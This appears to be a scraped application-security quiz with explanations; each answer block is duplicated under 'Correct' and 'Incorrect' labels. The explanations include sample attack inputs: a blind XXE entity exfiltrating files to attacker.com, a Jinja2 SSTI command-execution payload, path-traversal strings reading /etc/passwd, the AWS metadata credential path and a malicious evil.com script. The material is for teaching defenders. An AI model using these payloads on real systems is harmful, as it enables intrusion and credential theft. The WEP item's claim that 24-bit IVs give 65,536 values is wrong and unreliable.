IDOR (Insecure Direct Object Reference) / BOLA (Broken Object Level Authorization) is the #1 API vulnerability (OWASP API Security Top 10 2023). It occurs when an application uses a user-controllable identifier (account ID, order number, file name) to access objects without verifying the requesting user is authorized for that specific object. The fix is server-side authorization on every resource access: verify that the authenticated user's identity has ownership or permission for the specific object being requested β not just that they are logged in. Never rely on obscuring or randomizing IDs (security through obscurity) as a substitute for actual authorization checks. This is Broken Access Control (OWASP A01:2021).
9What is the purpose of Software Composition Analysis (SCA) in modern AppSec?
CorrectA: To identify and track vulnerabilities or licensing risks in open-source and third-party libraries used by the application
Modern applications typically contain 70β90% open-source code assembled from public registries (npm, Maven, PyPI). SCA tools automatically scan dependencies and transitive dependencies against vulnerability databases (CVE/NVD, GitHub Advisory Database, Snyk Vulnerability DB) to identify components with known security issues. SCA also flags licensing violations (GPL code in proprietary applications). SCA tools: Snyk, OWASP Dependency-Check, GitHub Dependabot, JFrog Xray. SCA is the tool that would have caught Apache Log4j in the dependency tree before Log4Shell (CVE-2021-44228) was exploited. The output helps teams understand their Software Bill of Materials (SBOM).
IncorrectA: To identify and track vulnerabilities or licensing risks in open-source and third-party libraries used by the application
Modern applications typically contain 70β90% open-source code assembled from public registries (npm, Maven, PyPI). SCA tools automatically scan dependencies and transitive dependencies against vulnerability databases (CVE/NVD, GitHub Advisory Database, Snyk Vulnerability DB) to identify components with known security issues. SCA also flags licensing violations (GPL code in proprietary applications). SCA tools: Snyk, OWASP Dependency-Check, GitHub Dependabot, JFrog Xray. SCA is the tool that would have caught Apache Log4j in the dependency tree before Log4Shell (CVE-2021-44228) was exploited. The output helps teams understand their Software Bill of Materials (SBOM).
10Why must a "Salt" be added to a password before it is hashed?
CorrectC: To ensure that two users with the exact same password will have completely different hash values, thwarting Rainbow Table attacks
A salt is a unique, randomly generated value appended to each user's password before hashing. Two effects: (1) Two users with the same password ("password123") will have completely different hashes, because their salts differ β preventing attackers from comparing hashes to identify shared passwords across the user table; (2) Precomputed Rainbow Table attacks become infeasible β a rainbow table for "password123" is useless if it hasn't been computed for "password123+{uniqueSalt}". The salt does not need to be secret β it is stored in plaintext alongside the hash in the database. Modern password hashing algorithms (Argon2id, bcrypt, scrypt) incorporate salting automatically and are intentionally designed to be computationally slow.
IncorrectC: To ensure that two users with the exact same password will have completely different hash values, thwarting Rainbow Table attacks
A salt is a unique, randomly generated value appended to each user's password before hashing. Two effects: (1) Two users with the same password ("password123") will have completely different hashes, because their salts differ β preventing attackers from comparing hashes to identify shared passwords across the user table; (2) Precomputed Rainbow Table attacks become infeasible β a rainbow table for "password123" is useless if it hasn't been computed for "password123+{uniqueSalt}". The salt does not need to be secret β it is stored in plaintext alongside the hash in the database. Modern password hashing algorithms (Argon2id, bcrypt, scrypt) incorporate salting automatically and are intentionally designed to be computationally slow.
11What protection does setting the HttpOnly flag on a session cookie provide?
CorrectC: It prevents client-side scripts (like JavaScript) from accessing the cookie, mitigating the risk of token theft via XSS
The HttpOnly cookie flag instructs the browser to make the cookie inaccessible to client-side JavaScript (document.cookie). This is a critical XSS mitigation: if an attacker successfully injects a JavaScript payload via XSS, they cannot use document.cookie to steal the session token if HttpOnly is set. The cookie is still sent automatically with every HTTP request β the restriction is only on JavaScript readability. This should always be combined with the Secure flag (HTTPS-only transmission) and an appropriate SameSite policy (SameSite=Strict or Lax for CSRF protection). Together these three flags constitute the baseline security configuration for any session cookie.
IncorrectC: It prevents client-side scripts (like JavaScript) from accessing the cookie, mitigating the risk of token theft via XSS
The HttpOnly cookie flag instructs the browser to make the cookie inaccessible to client-side JavaScript (document.cookie). This is a critical XSS mitigation: if an attacker successfully injects a JavaScript payload via XSS, they cannot use document.cookie to steal the session token if HttpOnly is set. The cookie is still sent automatically with every HTTP request β the restriction is only on JavaScript readability. This should always be combined with the Secure flag (HTTPS-only transmission) and an appropriate SameSite policy (SameSite=Strict or Lax for CSRF protection). Together these three flags constitute the baseline security configuration for any session cookie.
12What are the three standard components of a JSON Web Token (JWT)?
CorrectB: Header, Payload, Signature
A JWT consists of three Base64URL-encoded sections separated by dots: (1) Header β specifies the token type ("typ": "JWT") and signature algorithm ("alg": "RS256" or "HS256"); (2) Payload β contains claims: registered (iss, sub, exp, iat, jti), public, and private claims (user ID, roles); (3) Signature β computed by signing Header.Payload with the secret/private key to verify integrity. Example structure: eyJ... (header) . eyJ... (payload) . SflK... (signature). Important: the payload is Base64-encoded, NOT encrypted β anyone can decode and read it. Never store sensitive data (passwords, secrets) in JWT payloads. For sensitive payloads, use JWE (JSON Web Encryption).
IncorrectB: Header, Payload, Signature
A JWT consists of three Base64URL-encoded sections separated by dots: (1) Header β specifies the token type ("typ": "JWT") and signature algorithm ("alg": "RS256" or "HS256"); (2) Payload β contains claims: registered (iss, sub, exp, iat, jti), public, and private claims (user ID, roles); (3) Signature β computed by signing Header.Payload with the secret/private key to verify integrity. Example structure: eyJ... (header) . eyJ... (payload) . SflK... (signature). Important: the payload is Base64-encoded, NOT encrypted β anyone can decode and read it. Never store sensitive data (passwords, secrets) in JWT payloads. For sensitive payloads, use JWE (JSON Web Encryption).
13What is the primary purpose of the OAuth 2.0 framework?
CorrectD: To provide a standardized protocol for delegated authorization, allowing third-party applications to access user data without exposing their credentials
OAuth 2.0 is a delegated authorization framework. It solves the credential-sharing anti-pattern: instead of giving a third-party app your password to access your Google Drive, OAuth lets you grant that app limited access via an access token β without ever sharing your password. The user authorizes the application at the Identity Provider (Google), which issues an access token scoped to specific resources (read:drive) with a limited lifetime. The app uses this token to call the API. OAuth 2.0 defines four grant types: Authorization Code (web apps), Authorization Code + PKCE (mobile/SPA), Client Credentials (machine-to-machine), and Device Code (smart TVs). OpenID Connect (OIDC) extends OAuth 2.0 to add authentication (identity) on top of authorization.
IncorrectD: To provide a standardized protocol for delegated authorization, allowing third-party applications to access user data without exposing their credentials
OAuth 2.0 is a delegated authorization framework. It solves the credential-sharing anti-pattern: instead of giving a third-party app your password to access your Google Drive, OAuth lets you grant that app limited access via an access token β without ever sharing your password. The user authorizes the application at the Identity Provider (Google), which issues an access token scoped to specific resources (read:drive) with a limited lifetime. The app uses this token to call the API. OAuth 2.0 defines four grant types: Authorization Code (web apps), Authorization Code + PKCE (mobile/SPA), Client Credentials (machine-to-machine), and Device Code (smart TVs). OpenID Connect (OIDC) extends OAuth 2.0 to add authentication (identity) on top of authorization.
14What protection does setting the Secure flag on a cookie provide?
CorrectA: It guarantees the browser will only transmit the cookie over encrypted HTTPS connections
The Secure cookie flag instructs the browser to transmit the cookie only over HTTPS connections β never over plaintext HTTP. Without it, if a user visits the HTTP version of your site (even by accident, or via an SSL-stripping attack), their session cookie will be sent in cleartext and is trivially interceptable. An attacker on the same network using a tool like sslstrip can force the browser to use HTTP and capture the cookie. The Secure flag should always be set on session cookies, combined with HSTS (HTTP Strict Transport Security) at the server level β which tells the browser to never connect to the site over plain HTTP at all.
IncorrectA: It guarantees the browser will only transmit the cookie over encrypted HTTPS connections
The Secure cookie flag instructs the browser to transmit the cookie only over HTTPS connections β never over plaintext HTTP. Without it, if a user visits the HTTP version of your site (even by accident, or via an SSL-stripping attack), their session cookie will be sent in cleartext and is trivially interceptable. An attacker on the same network using a tool like sslstrip can force the browser to use HTTP and capture the cookie. The Secure flag should always be set on session cookies, combined with HSTS (HTTP Strict Transport Security) at the server level β which tells the browser to never connect to the site over plain HTTP at all.
15What is Runtime Application Self-Protection (RASP)?
CorrectC: A security technology built directly into the application runtime environment capable of intercepting and blocking attacks in real-time
RASP instruments itself directly into an application's runtime environment (typically via a language agent β Java agent, Node.js module, Python middleware) and monitors application behavior from the inside. Unlike a WAF that inspects HTTP traffic from the outside, RASP has full visibility into actual function calls, database queries, and system interactions. When it detects an attack pattern β a SQLi payload about to be passed to a database query, or a command injection string about to reach a shell execution call β it can block the call at the exact point of exploitation. RASP agents are available from Contrast Security, Sqreen (acquired by Datadog), and open-source projects. It is especially valuable for legacy applications where code fixes are difficult.
IncorrectC: A security technology built directly into the application runtime environment capable of intercepting and blocking attacks in real-time
RASP instruments itself directly into an application's runtime environment (typically via a language agent β Java agent, Node.js module, Python middleware) and monitors application behavior from the inside. Unlike a WAF that inspects HTTP traffic from the outside, RASP has full visibility into actual function calls, database queries, and system interactions. When it detects an attack pattern β a SQLi payload about to be passed to a database query, or a command injection string about to reach a shell execution call β it can block the call at the exact point of exploitation. RASP agents are available from Contrast Security, Sqreen (acquired by Datadog), and open-source projects. It is especially valuable for legacy applications where code fixes are difficult.
16What is "Fuzzing" (Fuzz Testing) in application security?
CorrectD: Feeding a program with massive amounts of random, invalid, or unexpected data to discover coding errors, memory leaks, or crashes
Fuzzing (Fuzz Testing) is a dynamic testing technique that bombards a program with malformed, unexpected, or random inputs at high speed to trigger crashes, assertion failures, memory corruption, or unhandled exceptions β which indicate vulnerabilities. Types: (1) Dumb fuzzing β purely random data; (2) Mutation-based fuzzing β mutates valid test cases (bitflipping, truncation); (3) Coverage-guided fuzzing β instruments code to track which paths are exercised and generate inputs that reach unexplored paths (AFL, libFuzzer). Google's OSS-Fuzz continuously fuzzes 1,000+ critical open-source projects and has found 10,000+ vulnerabilities including CVEs in OpenSSL, SQLite, and curl. Particularly effective for finding buffer overflows, use-after-free, and integer overflows in C/C++ code.
IncorrectD: Feeding a program with massive amounts of random, invalid, or unexpected data to discover coding errors, memory leaks, or crashes
Fuzzing (Fuzz Testing) is a dynamic testing technique that bombards a program with malformed, unexpected, or random inputs at high speed to trigger crashes, assertion failures, memory corruption, or unhandled exceptions β which indicate vulnerabilities. Types: (1) Dumb fuzzing β purely random data; (2) Mutation-based fuzzing β mutates valid test cases (bitflipping, truncation); (3) Coverage-guided fuzzing β instruments code to track which paths are exercised and generate inputs that reach unexplored paths (AFL, libFuzzer). Google's OSS-Fuzz continuously fuzzes 1,000+ critical open-source projects and has found 10,000+ vulnerabilities including CVEs in OpenSSL, SQLite, and curl. Particularly effective for finding buffer overflows, use-after-free, and integer overflows in C/C++ code.
17How can developers prevent Directory Traversal (Path Traversal) attacks when an application serves files based on user input?
CorrectC: By strictly validating input against an allow-list of permitted filenames and stripping directory manipulation characters (e.g., ../)
Directory Traversal (Path Traversal) occurs when an application uses user input to construct a file path without proper validation, allowing an attacker to use ../ sequences to escape the intended directory. Example: a request for ?file=../../../etc/passwd reads the Unix password file instead of the intended path. Prevention requires: (1) Use an allow-list of permitted filenames (not a denylist of dangerous sequences β these are easily bypassed with URL encoding: ..%2F, %2E%2E%2F, ....//); (2) Resolve the full canonical path after user input substitution using realpath() or Path.resolve() and verify it still starts with the intended safe base directory; (3) Use indirect object references β a numeric index mapped server-side to actual filenames rather than using the filename itself.
IncorrectC: By strictly validating input against an allow-list of permitted filenames and stripping directory manipulation characters (e.g., ../)
Directory Traversal (Path Traversal) occurs when an application uses user input to construct a file path without proper validation, allowing an attacker to use ../ sequences to escape the intended directory. Example: a request for ?file=../../../etc/passwd reads the Unix password file instead of the intended path. Prevention requires: (1) Use an allow-list of permitted filenames (not a denylist of dangerous sequences β these are easily bypassed with URL encoding: ..%2F, %2E%2E%2F, ....//); (2) Resolve the full canonical path after user input substitution using realpath() or Path.resolve() and verify it still starts with the intended safe base directory; (3) Use indirect object references β a numeric index mapped server-side to actual filenames rather than using the filename itself.
18What is the "Principle of Defense in Depth"?
CorrectB: Implementing multiple, layered, and overlapping security controls so that if one fails, others remain to thwart the attack
Defense in Depth (DiD) is a military-origin security strategy adapted for cybersecurity: never rely on a single control. Multiple overlapping layers means the failure of any one control does not result in a complete compromise. Applied to web application security: an attacker must defeat: a WAF (which may block the initial probe), authentication controls (which prevent unauthorized access even if the WAF fails), authorization controls (which limit what an authenticated attacker can do), encryption (which protects data even if the attacker reaches the database), and logging/monitoring (which detects the breach and limits dwell time). Each layer independently reduces risk and collectively creates a system where the cost of an attack exceeds the attacker's resources.
IncorrectB: Implementing multiple, layered, and overlapping security controls so that if one fails, others remain to thwart the attack
Defense in Depth (DiD) is a military-origin security strategy adapted for cybersecurity: never rely on a single control. Multiple overlapping layers means the failure of any one control does not result in a complete compromise. Applied to web application security: an attacker must defeat: a WAF (which may block the initial probe), authentication controls (which prevent unauthorized access even if the WAF fails), authorization controls (which limit what an authenticated attacker can do), encryption (which protects data even if the attacker reaches the database), and logging/monitoring (which detects the breach and limits dwell time). Each layer independently reduces risk and collectively creates a system where the cost of an attack exceeds the attacker's resources.
19In the context of SAML (Security Assertion Markup Language), what is an "Assertion"?
CorrectD: An XML document issued by an Identity Provider containing statements about a user's identity and access rights
SAML (Security Assertion Markup Language) is an XML-based open standard for federated identity β primarily used for enterprise SSO (Single Sign-On). A SAML Assertion is a digitally signed XML document issued by the Identity Provider (IdP β e.g., ADFS, Okta) to the Service Provider (SP β the application) after a user authenticates with the IdP. The assertion contains: authentication statements (the user authenticated at time X via method Y), attribute statements (user's email, role, department), and authorization decision statements. The SP trusts the assertion because it is signed with the IdP's X.509 certificate. Critical attack: SAML Signature Wrapping (XSW) β modifying the assertion's XML structure to include a malicious assertion while keeping the valid signature attached to a different node.
IncorrectD: An XML document issued by an Identity Provider containing statements about a user's identity and access rights
SAML (Security Assertion Markup Language) is an XML-based open standard for federated identity β primarily used for enterprise SSO (Single Sign-On). A SAML Assertion is a digitally signed XML document issued by the Identity Provider (IdP β e.g., ADFS, Okta) to the Service Provider (SP β the application) after a user authenticates with the IdP. The assertion contains: authentication statements (the user authenticated at time X via method Y), attribute statements (user's email, role, department), and authorization decision statements. The SP trusts the assertion because it is signed with the IdP's X.509 certificate. Critical attack: SAML Signature Wrapping (XSW) β modifying the assertion's XML structure to include a malicious assertion while keeping the valid signature attached to a different node.
20What is a TOCTOU (Time-of-Check to Time-of-Use) vulnerability?
CorrectB: A race condition where a system verifies a security condition, but the state of the object changes maliciously before the application executes the action
TOCTOU (Time-of-Check to Time-of-Use) is a race condition where a security check is performed at time T1, but the checked resource changes state between T1 and the actual use at T2, invalidating the check. Classic example: a banking application checks a user's balance (T1: balance = $100, withdraw $100 β allowed), but before debiting (T2), a second concurrent request also passes the check. Both withdrawals execute, overdrawing the account. Fix: use atomic operations, database transactions with appropriate isolation levels (SERIALIZABLE), mutex locks, or idempotency keys. TOCTOU is categorized under Insecure Design (OWASP A04:2021). File system TOCTOU (check file permissions then open) is exploitable via symlink attacks in privileged Unix processes.
IncorrectB: A race condition where a system verifies a security condition, but the state of the object changes maliciously before the application executes the action
TOCTOU (Time-of-Check to Time-of-Use) is a race condition where a security check is performed at time T1, but the checked resource changes state between T1 and the actual use at T2, invalidating the check. Classic example: a banking application checks a user's balance (T1: balance = $100, withdraw $100 β allowed), but before debiting (T2), a second concurrent request also passes the check. Both withdrawals execute, overdrawing the account. Fix: use atomic operations, database transactions with appropriate isolation levels (SERIALIZABLE), mutex locks, or idempotency keys. TOCTOU is categorized under Insecure Design (OWASP A04:2021). File system TOCTOU (check file permissions then open) is exploitable via symlink attacks in privileged Unix processes.
Application Security β Advanced
1In a Server-Side Request Forgery (SSRF) attack targeting an application hosted in AWS, which critical internal endpoint does the attacker typically attempt to query to extract temporary IAM credentials?
CorrectA: The Instance Metadata Service (IMDS) at 169.254.169.254
In SSRF attacks against AWS-hosted applications, the primary target is http://169.254.169.254/latest/meta-data/ β the EC2 Instance Metadata Service (IMDS). This link-local address is accessible from any EC2 instance but unreachable externally, making SSRF the only remote vector to reach it. The path /latest/meta-data/iam/security-credentials/{role-name} returns temporary AWS access keys, secret keys, and session tokens valid for hours β enabling full AWS API access with the instance's role permissions. The Capital One breach (2019) exploited this exact path, exposing 100 million+ customer records. Mitigation: require IMDSv2 (session-oriented, requires a PUT request before GET), which breaks most SSRF exploits, and apply deny-by-default egress firewall rules.
IncorrectA: The Instance Metadata Service (IMDS) at 169.254.169.254
In SSRF attacks against AWS-hosted applications, the primary target is http://169.254.169.254/latest/meta-data/ β the EC2 Instance Metadata Service (IMDS). This link-local address is accessible from any EC2 instance but unreachable externally, making SSRF the only remote vector to reach it. The path /latest/meta-data/iam/security-credentials/{role-name} returns temporary AWS access keys, secret keys, and session tokens valid for hours β enabling full AWS API access with the instance's role permissions. The Capital One breach (2019) exploited this exact path, exposing 100 million+ customer records. Mitigation: require IMDSv2 (session-oriented, requires a PUT request before GET), which breaks most SSRF exploits, and apply deny-by-default egress firewall rules.
2What is the fundamental mechanism behind an HTTP Request Smuggling attack?
CorrectD: Exploiting discrepancies in how front-end proxies and back-end servers parse conflicting Content-Length and Transfer-Encoding headers
HTTP Request Smuggling exploits a discrepancy between a front-end proxy (reverse proxy, CDN, load balancer) and a back-end application server in determining where one HTTP request ends and the next begins. HTTP/1.1 provides two mechanisms to specify body length: Content-Length (byte count) and Transfer-Encoding: chunked. When the front-end and back-end disagree on which header takes precedence, an attacker crafts a request that the proxy treats as one complete request but the back-end treats as two. The "smuggled" partial request poisons the processing queue of subsequent legitimate users. Impact: WAF bypass, credential hijacking, cache poisoning, access to restricted API endpoints, and reflected self-XSS escalation to capture other users' sessions.
IncorrectD: Exploiting discrepancies in how front-end proxies and back-end servers parse conflicting Content-Length and Transfer-Encoding headers
HTTP Request Smuggling exploits a discrepancy between a front-end proxy (reverse proxy, CDN, load balancer) and a back-end application server in determining where one HTTP request ends and the next begins. HTTP/1.1 provides two mechanisms to specify body length: Content-Length (byte count) and Transfer-Encoding: chunked. When the front-end and back-end disagree on which header takes precedence, an attacker crafts a request that the proxy treats as one complete request but the back-end treats as two. The "smuggled" partial request poisons the processing queue of subsequent legitimate users. Impact: WAF bypass, credential hijacking, cache poisoning, access to restricted API endpoints, and reflected self-XSS escalation to capture other users' sessions.
3How does an attacker typically achieve Remote Code Execution (RCE) via an Insecure Deserialization vulnerability?
CorrectC: By injecting a carefully crafted "gadget chain" β a sequence of existing, legitimate classes within the application's environment β into the serialized payload
Insecure Deserialization RCE via Gadget Chains exploits the automatic property and method calls that occur when an object is deserialized. The attacker constructs a malicious serialized object graph β a "gadget chain" β that links existing, already-loaded legitimate classes in the classpath (like Apache CommonsCollections' InvokerTransformer, or Spring's PropertyPathFactoryBean). When the deserialization engine processes the object, it automatically invokes methods on these chained gadgets, ultimately calling Runtime.exec() or ProcessBuilder to execute OS commands. The attacker never needs to inject new code β only manipulate the linking of existing classes. Discovered by Foxglove Security for Java in 2015. Prevention: avoid deserializing untrusted data; use integrity checks (digital signatures) on serialized objects; use serialization filters (ObjectInputFilter in Java 9+).
IncorrectC: By injecting a carefully crafted "gadget chain" β a sequence of existing, legitimate classes within the application's environment β into the serialized payload
Insecure Deserialization RCE via Gadget Chains exploits the automatic property and method calls that occur when an object is deserialized. The attacker constructs a malicious serialized object graph β a "gadget chain" β that links existing, already-loaded legitimate classes in the classpath (like Apache CommonsCollections' InvokerTransformer, or Spring's PropertyPathFactoryBean). When the deserialization engine processes the object, it automatically invokes methods on these chained gadgets, ultimately calling Runtime.exec() or ProcessBuilder to execute OS commands. The attacker never needs to inject new code β only manipulate the linking of existing classes. Discovered by Foxglove Security for Java in 2015. Prevention: avoid deserializing untrusted data; use integrity checks (digital signatures) on serialized objects; use serialization filters (ObjectInputFilter in Java 9+).
4To exfiltrate data using an XML External Entity (XXE) vulnerability when the application does not return the results directly to the screen (Blind XXE), an attacker must use:
CorrectA: An Out-of-Band (OOB) technique, forcing the server to send the extracted data to an external, attacker-controlled domain
Blind XXE is needed when the application processes the malicious XML but doesn't reflect the external entity value in the HTTP response. Using an Out-of-Band (OOB) technique: the attacker hosts a malicious external DTD on their server (e.g., https://attacker.com/evil.dtd); within it they declare entities that load a local file (file:///etc/passwd) and embed its contents into a URL request back to the attacker's server (<!ENTITY exfil SYSTEM "https://attacker.com/collect?data=%data;">). The vulnerable server fetches the DTD, reads the file, and sends the data to the attacker via the outbound HTTP/DNS request. Burp Collaborator or interactsh are tools that capture these OOB interactions. Mitigation: disable external entity processing in the XML parser entirely β OWASP recommends disabling DOCTYPE declarations.
IncorrectA: An Out-of-Band (OOB) technique, forcing the server to send the extracted data to an external, attacker-controlled domain
Blind XXE is needed when the application processes the malicious XML but doesn't reflect the external entity value in the HTTP response. Using an Out-of-Band (OOB) technique: the attacker hosts a malicious external DTD on their server (e.g., https://attacker.com/evil.dtd); within it they declare entities that load a local file (file:///etc/passwd) and embed its contents into a URL request back to the attacker's server (<!ENTITY exfil SYSTEM "https://attacker.com/collect?data=%data;">). The vulnerable server fetches the DTD, reads the file, and sends the data to the attacker via the outbound HTTP/DNS request. Burp Collaborator or interactsh are tools that capture these OOB interactions. Mitigation: disable external entity processing in the XML parser entirely β OWASP recommends disabling DOCTYPE declarations.
5What is a highly critical configuration flaw regarding the validation of JSON Web Tokens (JWTs)?
CorrectB: The server failing to enforce algorithms and accepting tokens where the header specifies "alg": "none", allowing signature bypass
The alg:none JWT attack exploits libraries that trust the algorithm specified in the token's own header. An attacker takes a legitimate JWT, decodes the Base64url header+payload, modifies claims (e.g., "role":"admin"), sets "alg":"none" in the header, removes the signature entirely, and resubmits. A misconfigured library sees "no signature required" and accepts the forged token without verification. Additional attack: algorithm confusion β on an RS256 (asymmetric) system, changing alg from RS256 to HS256 and signing with the server's public key (which is typically published). The HMAC verification then succeeds using the known public key as the HMAC secret. Fix: explicitly whitelist the expected algorithm in your JWT library configuration; never trust the "alg" value from the untrusted token itself.
IncorrectB: The server failing to enforce algorithms and accepting tokens where the header specifies "alg": "none", allowing signature bypass
The alg:none JWT attack exploits libraries that trust the algorithm specified in the token's own header. An attacker takes a legitimate JWT, decodes the Base64url header+payload, modifies claims (e.g., "role":"admin"), sets "alg":"none" in the header, removes the signature entirely, and resubmits. A misconfigured library sees "no signature required" and accepts the forged token without verification. Additional attack: algorithm confusion β on an RS256 (asymmetric) system, changing alg from RS256 to HS256 and signing with the server's public key (which is typically published). The HMAC verification then succeeds using the known public key as the HMAC secret. Fix: explicitly whitelist the expected algorithm in your JWT library configuration; never trust the "alg" value from the untrusted token itself.
6In which programming environment does a "Prototype Pollution" vulnerability predominantly occur, allowing attackers to inject properties into base object prototypes?
CorrectD: JavaScript (Node.js and client-side)
Prototype Pollution is a JavaScript-specific vulnerability. In JavaScript, every object inherits from a prototype chain rooted at Object.prototype. If an application uses user-controlled keys in an operation like obj[key][value] = data without sanitizing key for __proto__ or constructor.prototype, an attacker can inject properties into ALL JavaScript objects. Example payload: {"__proto__": {"isAdmin": true}}. If server code checks if (user.isAdmin) and the prototype now has isAdmin:true, all users pass the check. In Node.js backend code this can lead to RCE via gadget chains in libraries (lodash, jQuery were vulnerable). Fix: use Map instead of plain objects for user-controlled data containers; validate/sanitize keys against a denylist (__proto__, prototype, constructor); use Object.create(null) to create prototype-less objects.
IncorrectD: JavaScript (Node.js and client-side)
Prototype Pollution is a JavaScript-specific vulnerability. In JavaScript, every object inherits from a prototype chain rooted at Object.prototype. If an application uses user-controlled keys in an operation like obj[key][value] = data without sanitizing key for __proto__ or constructor.prototype, an attacker can inject properties into ALL JavaScript objects. Example payload: {"__proto__": {"isAdmin": true}}. If server code checks if (user.isAdmin) and the prototype now has isAdmin:true, all users pass the check. In Node.js backend code this can lead to RCE via gadget chains in libraries (lodash, jQuery were vulnerable). Fix: use Map instead of plain objects for user-controlled data containers; validate/sanitize keys against a denylist (__proto__, prototype, constructor); use Object.create(null) to create prototype-less objects.
7What is "Server-Side Template Injection" (SSTI)?
CorrectC: Injecting malicious payload syntax into a native web template engine (like Jinja2 or Twig), which is unsafely evaluated by the server, leading to RCE
SSTI occurs when user input is embedded directly into a server-side template string that is then rendered by a template engine. The detection test: submit {{7*7}} (Jinja2 / Twig), ${7*7} (FreeMarker / Velocity), or <%=7*7%> (ERB). If the response contains 49, template execution is confirmed. From there, attackers escalate to RCE by traversing the Python object hierarchy (Jinja2): {{config.__class__.__init__.__globals__['os'].popen('id').read()}} to execute arbitrary OS commands. This falls under OWASP A03:2021 (Injection). Prevention: never pass user input directly as a template string; render user content as data variables within a template; use logic-less templates (Mustache) which don't support arbitrary code execution in template syntax.
IncorrectC: Injecting malicious payload syntax into a native web template engine (like Jinja2 or Twig), which is unsafely evaluated by the server, leading to RCE
SSTI occurs when user input is embedded directly into a server-side template string that is then rendered by a template engine. The detection test: submit {{7*7}} (Jinja2 / Twig), ${7*7} (FreeMarker / Velocity), or <%=7*7%> (ERB). If the response contains 49, template execution is confirmed. From there, attackers escalate to RCE by traversing the Python object hierarchy (Jinja2): {{config.__class__.__init__.__globals__['os'].popen('id').read()}} to execute arbitrary OS commands. This falls under OWASP A03:2021 (Injection). Prevention: never pass user input directly as a template string; render user content as data variables within a template; use logic-less templates (Mustache) which don't support arbitrary code execution in template syntax.
8In modern DevSecOps, what is the purpose of tools like Docker Notary or Sigstore Cosign?
CorrectB: To digitally sign container images, ensuring the integrity and provenance of the image before the orchestrator deploys it
Container image signing addresses a critical supply-chain integrity risk: without signing, a container deployment pipeline could be tricked into pulling a malicious image that has been substituted in a registry (man-in-the-middle, registry compromise, or tag hijacking). Docker Notary (The Update Framework) and Sigstore Cosign allow image publishers to cryptographically sign container images with their private key. Before deployment, the Kubernetes admission controller (Kyverno, OPA Gatekeeper) or the container runtime verifies the image signature against a trusted public key β rejecting unsigned or tampered images. Sigstore's Cosign uses keyless signing backed by OIDC identity + an append-only public transparency log (Rekor), making it auditable and phishing-resistant.
IncorrectB: To digitally sign container images, ensuring the integrity and provenance of the image before the orchestrator deploys it
Container image signing addresses a critical supply-chain integrity risk: without signing, a container deployment pipeline could be tricked into pulling a malicious image that has been substituted in a registry (man-in-the-middle, registry compromise, or tag hijacking). Docker Notary (The Update Framework) and Sigstore Cosign allow image publishers to cryptographically sign container images with their private key. Before deployment, the Kubernetes admission controller (Kyverno, OPA Gatekeeper) or the container runtime verifies the image signature against a trusted public key β rejecting unsigned or tampered images. Sigstore's Cosign uses keyless signing backed by OIDC identity + an append-only public transparency log (Rekor), making it auditable and phishing-resistant.
9How does a "Subdomain Takeover" occur?
CorrectC: A DNS record points to a de-provisioned external cloud service (like an AWS S3 bucket or GitHub Page), allowing an attacker to claim that service space and hijack the subdomain
Subdomain Takeover exploits stale DNS records. When an organization decommissions a cloud resource (S3 bucket, GitHub Pages site, Azure Web App, Heroku dyno) but neglects to also remove its CNAME DNS record pointing to that resource, the subdomain is "dangling." An attacker can register or claim the same resource name on the external platform (create an S3 bucket with the exact name the CNAME points to) and thus serve arbitrary content from the organization's subdomain. Implications: serves malware under the trusted domain, phishing pages that pass domain-based security checks, cookie theft (if cookies lack proper Domain scoping), and damage to brand reputation. Detected with tools like nuclei, subjack, and can-i-take-over-xyz GitHub repository.
IncorrectC: A DNS record points to a de-provisioned external cloud service (like an AWS S3 bucket or GitHub Page), allowing an attacker to claim that service space and hijack the subdomain
Subdomain Takeover exploits stale DNS records. When an organization decommissions a cloud resource (S3 bucket, GitHub Pages site, Azure Web App, Heroku dyno) but neglects to also remove its CNAME DNS record pointing to that resource, the subdomain is "dangling." An attacker can register or claim the same resource name on the external platform (create an S3 bucket with the exact name the CNAME points to) and thus serve arbitrary content from the organization's subdomain. Implications: serves malware under the trusted domain, phishing pages that pass domain-based security checks, cookie theft (if cookies lack proper Domain scoping), and damage to brand reputation. Detected with tools like nuclei, subjack, and can-i-take-over-xyz GitHub repository.
10What is "Web Cache Poisoning"?
CorrectA: An attacker manipulating an application into storing a maliciously crafted response in its caching layer, which is subsequently served to all other legitimate users
Web Cache Poisoning (researched and popularized by James Kettle at PortSwigger) exploits the difference between "keyed" and "unkeyed" inputs in HTTP caching. A cache key typically includes GET method + path + Host header. However, other headers (X-Forwarded-Host, X-Original-URL, Origin) may influence the application's response content but are excluded from the cache key. An attacker crafts a request with a malicious X-Forwarded-Host header that makes the application embed an attacker-controlled URL in the response (e.g., as a JS import: <script src="https://evil.com/xss.js">). If this response is cached, every subsequent user requesting the resource receives the poisoned response and executes the attacker's JavaScript β a stored XSS with application-wide reach.
IncorrectA: An attacker manipulating an application into storing a maliciously crafted response in its caching layer, which is subsequently served to all other legitimate users
Web Cache Poisoning (researched and popularized by James Kettle at PortSwigger) exploits the difference between "keyed" and "unkeyed" inputs in HTTP caching. A cache key typically includes GET method + path + Host header. However, other headers (X-Forwarded-Host, X-Original-URL, Origin) may influence the application's response content but are excluded from the cache key. An attacker crafts a request with a malicious X-Forwarded-Host header that makes the application embed an attacker-controlled URL in the response (e.g., as a JS import: <script src="https://evil.com/xss.js">). If this response is cached, every subsequent user requesting the resource receives the poisoned response and executes the attacker's JavaScript β a stored XSS with application-wide reach.
11Which severe cryptographic flaw allowed attackers to completely break the WEP wireless encryption standard and affects certain implementations of stream ciphers?
CorrectD: Cryptographic Nonce / Initialization Vector (IV) reuse, allowing attackers to cancel out the keystream using XOR
IV (Initialization Vector) / Nonce reuse is catastrophically broken for stream ciphers and CTR/GCM block cipher modes. A stream cipher generates a keystream by combining the secret key with a unique IV: ciphertext = plaintext XOR keystream. If the same key+IV pair is reused for two different plaintexts (C1 = P1 XOR K, C2 = P2 XOR K), then C1 XOR C2 = P1 XOR P2 β the keystream cancels out, and statistical analysis recovers both plaintexts. WEP used RC4 with short 24-bit IVs (65,536 possible values), guaranteeing collisions on busy networks. The Attack was demonstrated in minutes. For AES-GCM, IV reuse not only recovers plaintexts but directly reveals the authentication key, breaking all integrity protection. Fix: use random IVs (CSPRNG), never reuse nonces, prefer SIV (Synthetic IV) constructions that are nonce-misuse-resistant.
IncorrectD: Cryptographic Nonce / Initialization Vector (IV) reuse, allowing attackers to cancel out the keystream using XOR
